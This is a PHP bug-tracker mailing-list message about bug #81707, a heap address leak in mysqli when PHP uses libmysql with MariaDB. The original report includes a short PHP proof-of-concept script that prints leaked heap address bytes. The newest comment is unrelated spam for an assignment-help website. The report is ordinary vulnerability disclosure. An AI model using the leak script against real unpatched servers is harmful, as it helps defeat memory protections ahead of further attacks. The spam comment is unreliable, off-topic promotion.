Bug #81707 [Com]: Heap address leak when PHP is configured with libmysql + mariadb

From: Date: Mon, 14 Feb 2022 07:29:58 +0000
Subject: Bug #81707 [Com]: Heap address leak when PHP is configured with libmysql + mariadb
References: 1  Groups: php.bugs 
Request: Send a blank email to php-bugs+get-239755@lists.php.net to get a copy of this message
Edit report at https://bugs.php.net/bug.php?id=81707&edit=1 ID: 81707 Comment by: hndassignmentshelp1 at gmail dot com Reported by: ive_jihwan at zerocution dot com Summary: Heap address leak when PHP is configured with libmysql + mariadb Status: Open Type: Bug Package: MySQLi related Operating System: WSL PHP Version: Irrelevant Block user comment: N Private report: N New Comment: Driscoll Model of Reflection Get Driscoll Model of Reflection Assignment Help by www.hndassignmenthelp.com at Affordable Price and Quality Delivery on Time. We have more than 7000+ Qualified British Experts in the team to give you the best online assignment help in the HND Assignment Help of Driscoll reflective model. https://www.hndassignmenthelp.com/driscoll-model-of-reflection-by-hnd-assignment-help/ hndassignmenthelp, assignmenthelponline, driscollmodelofreflection, driscollreflectivemodel Previous Comments: ------------------------------------------------------------------------ [2022-01-19 06:36:08] ive_jihwan at zerocution dot com Description: ------------ When PHP is configured with libmysql instead of mysqlnd, there is a possibility to leak emalloc()ed address via simple SQL query with bind_result and fetch. This only copies the lower 4 bytes of the address, but since the MSB is fixed as 0x7f, it's reasonable to find a full heap address. I tested this in WSL + MariaDB 10.5.13 + PHP 8.2.0-dev with libmysql build Test script: --------------- <?php $mysqli = new mysqli("127.0.0.1", "test", "%"); $stmt = $mysqli->prepare("select 1"); $stmt->bind_result($a); $stmt->prepare("select 1"); $stmt->execute(); $stmt->fetch(); echo "$a"; // the lowest 4 bytes of heap structure if (!($a & (int)0xffffffff00000000)) { printf("Failed, try again\n"); die(); } printf("Address in heap leaked: 0x7fff%x\n", $a & 0xffffffff); Expected result: ---------------- Should return 1 or 0 Actual result: -------------- the lower 4 bytes of (int *)stmt->result.buf[0].val ------------------------------------------------------------------------ -- Edit this bug report at https://bugs.php.net/bug.php?id=81707&edit=1

« previous php.bugs (#239755) next »